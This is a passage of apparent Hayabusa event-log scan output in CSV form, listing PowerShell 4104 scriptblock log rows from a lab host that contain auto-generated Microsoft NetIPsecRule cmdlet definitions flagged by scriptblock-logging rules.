$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 